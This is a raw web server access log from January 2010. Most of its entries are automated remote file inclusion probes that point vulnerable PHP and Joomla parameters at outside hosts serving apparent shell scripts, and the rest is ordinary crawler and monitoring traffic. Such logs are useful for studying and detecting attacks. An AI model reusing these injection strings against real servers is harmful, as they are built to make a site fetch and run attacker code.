67.19.194.26 - - [05/Jan/2010:03:14:19 -0500] "GET /logs/error_log.Q109122000%20%20//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:14:21 -0500] "GET /logs/error_log.Q109122000%20%20//include/prodler.class.php?sPath=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:14:31 -0500] "GET /logs/access_log.Q109110800%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:14:33 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:14:33 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:14:35 -0500] "GET /logs/access_log.Q109111200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:15:09 -0500] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:15:09 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:15:09 -0500] "GET //include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:15:17 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:15:25 -0500] "GET /logs/access_log.Q109110800%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:15:25 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:15:29 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:15:33 -0500] "GET /logs/access_log.Q109052300//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:15:38 -0500] "GET /logs/access_log.Q109091100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:16:24 -0500] "GET //include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:16:24 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:16:24 -0500] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:16:24 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:17:52 -0500] "GET /logs/access_log.Q109102100//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:17:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:17:52 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:01 -0500] "GET //include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:01 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:08 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:08 -0500] "GET //include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:08 -0500] "GET /logs/access_log.Q109102100//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:08 -0500] "GET /logs/access_log.Q109102100//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:15 -0500] "GET /logs/access_log.Q109102100//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:15 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.255.32.182 - - [05/Jan/2010:03:18:15 -0500] "GET //include/admin.lib.inc.php?site_path=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:18:24 -0500] "GET /logs/error_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:18:24 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:18:24 -0500] "GET //include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:18:29 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:18:41 -0500] "GET /logs/access_log.Q109092200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:18:45 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.218.126.236 - - [05/Jan/2010:03:18:46 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:18:46 -0500] "GET /logs/access_log.Q109062200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:18:46 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:18:55 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:03:18:55 -0500] "GET /logs/access_log.Q109101900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
211.218.126.236 - - [05/Jan/2010:03:18:56 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:18:56 -0500] "GET /logs/access_log.Q109062200%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:19:05 -0500] "GET /logs/access_log.Q109110900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:19:15 -0500] "GET /logs/access_log.Q109110900%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:03:19:50 -0500] "GET /mail.inc.php?root=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:03:19:50 -0500] "GET /logs/mail.inc.php?root=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:03:19:51 -0500] "GET /mail.inc.php?root=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
60.251.165.181 - - [05/Jan/2010:03:19:51 -0500] "GET /logs/mail.inc.php?root=http://200.199.242.22/images/.ajim/ajim1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:21:38 -0500] "GET /logs/access_log.Q109091100%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
189.72.17.151 - - [05/Jan/2010:03:21:59 -0500] "GET //components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
189.72.17.151 - - [05/Jan/2010:03:21:59 -0500] "GET /logs//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
189.72.17.151 - - [05/Jan/2010:03:21:59 -0500] "GET /logs/access_log.Q109080200//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:22:08 -0500] "GET /logs/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:22:08 -0500] "GET /logs/access_log.Q109120600%20%20/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:22:08 -0500] "GET /skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
189.72.17.151 - - [05/Jan/2010:03:22:23 -0500] "GET /logs/access_log.Q109121000//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:03:22:25 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "Googlebot-Image/1.0"
66.249.65.7 - - [05/Jan/2010:03:22:25 -0500] "GET /images/Office%20Supply/sd_left-top.gif HTTP/1.1" 200 95 "-" "Googlebot-Image/1.0"
74.55.15.194 - - [05/Jan/2010:03:22:35 -0500] "GET /logs/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:22:35 -0500] "GET /logs/access_log.Q109120600/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:22:35 -0500] "GET /skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:23:46 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.22.197.240 - - [05/Jan/2010:03:24:09 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:24:09 -0500] "GET /logs/access_log.Q109072400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:24:12 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:24:30 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:24:30 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:24:30 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:24:30 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:24:48 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:24:48 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:24:48 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:24:48 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:24:49 -0500] "GET /logs/error_log.Q109120700/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:24:53 -0500] "GET /logs/access_log.Q109120600%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:24:54 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:24:54 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:24:54 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:24:54 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:24:55 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:24:55 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:02 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:02 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:02 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:02 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:25:03 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:25:03 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:25:03 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:25:03 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:08 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:08 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:10 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:10 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:10 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
211.115.213.195 - - [05/Jan/2010:03:25:10 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:25:11 -0500] "GET /logs/access_log.Q109080100//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:25:11 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:25:20 -0500] "GET /logs/access_log.Q109102300%20%20//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:25:26 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:25:26 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:25:26 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
212.175.5.130 - - [05/Jan/2010:03:25:26 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:27 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:27 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:27 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:27 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:28 -0500] "GET /logs/access_log.Q109081500%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:28 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:25:34 -0500] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:25:34 -0500] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 200 32913 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:25:35 -0500] "GET /logs/access_log.Q109111800%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.218.126.236 - - [05/Jan/2010:03:25:40 -0500] "GET /logs/error_log.Q109082800%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.idei.by/web.idei.by/templates/1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:46 -0500] "GET /logs/access_log.Q109080600%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:25:47 -0500] "GET /logs/access_log.Q109080600%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.55.15.194 - - [05/Jan/2010:03:26:02 -0500] "GET /logs/error_log.Q109120700%20%20/skin/zb_manual/setup.php?dir=http://www.hyonsvc.co.kr//bbs//upload/id/id?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:26:05 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:26:05 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
64.34.177.222 - - [05/Jan/2010:03:26:05 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
